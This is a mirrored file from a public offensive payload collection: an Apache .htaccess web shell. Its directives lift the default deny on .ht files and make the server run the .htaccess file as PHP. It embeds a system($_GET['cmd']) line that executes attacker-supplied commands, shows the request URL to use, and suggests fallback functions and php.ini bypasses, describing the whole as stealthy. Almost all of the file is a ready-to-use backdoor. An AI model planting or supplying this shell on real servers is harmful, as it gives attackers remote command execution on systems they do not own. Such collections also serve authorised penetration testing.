mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-30 08:15:25 +00:00
24 lines
662 B
Plaintext
24 lines
662 B
Plaintext
# htaccess backdoor shell
|
|
# this is relatively stealthy compared to a typical webshell
|
|
|
|
# overriding deny rule
|
|
# making htaccess accessible from the internet
|
|
# without this you'll get a HTTP 403
|
|
<Files ~ "^\.ht">
|
|
Require all granted
|
|
Order allow,deny
|
|
Allow from all
|
|
</Files>
|
|
|
|
# Make the server treat .htaccess file as .php file
|
|
AddType application/x-httpd-php .htaccess
|
|
|
|
# <?php system($_GET['cmd']); ?>
|
|
|
|
# To execute commands you would navigate to:
|
|
# http://vulnerable.com/.htaccess?cmd=YourCommand
|
|
|
|
# If system(); isnt working then try other syscalls
|
|
# e.g. passthru(); shell_exec(); etc
|
|
# If you still cant execute syscalls, try bypassing php.ini via htaccess
|